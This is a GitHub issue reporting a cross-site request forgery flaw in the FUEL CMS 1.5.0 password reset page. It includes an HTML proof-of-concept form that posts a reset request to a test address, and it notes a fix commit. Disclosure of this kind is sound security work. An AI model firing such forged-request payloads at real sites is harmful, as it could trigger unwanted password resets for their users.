New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

FUEL CMS 1.5.0 contains a cross-site request forgery (CSRF) vulnerability #584

Open

bunneyOps opened this issue Aug 10, 2021 · 1 comment

bunneyOps commented Aug 10, 2021

Because my mailbox function is not configured, it cannot be fully demonstrated. There is a CSRF vulnerability in the password modification page.

http://website/fuel/index.php/fuel/login/pwd_reset

csrf POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.255.130/fuel/index.php/fuel/login/pwd_reset" method="POST">
      <input type="hidden" name="email" value="1231&#64;1&#46;com" />
      <input type="hidden" name="Submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The text was updated successfully, but these errors were encountered:

daylightstudio pushed a commit that referenced this issue


          fix: for issue #584

6164cd7

BigSkidderHyPhen commented Aug 18, 2021

大师傅拿下cve了吗

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment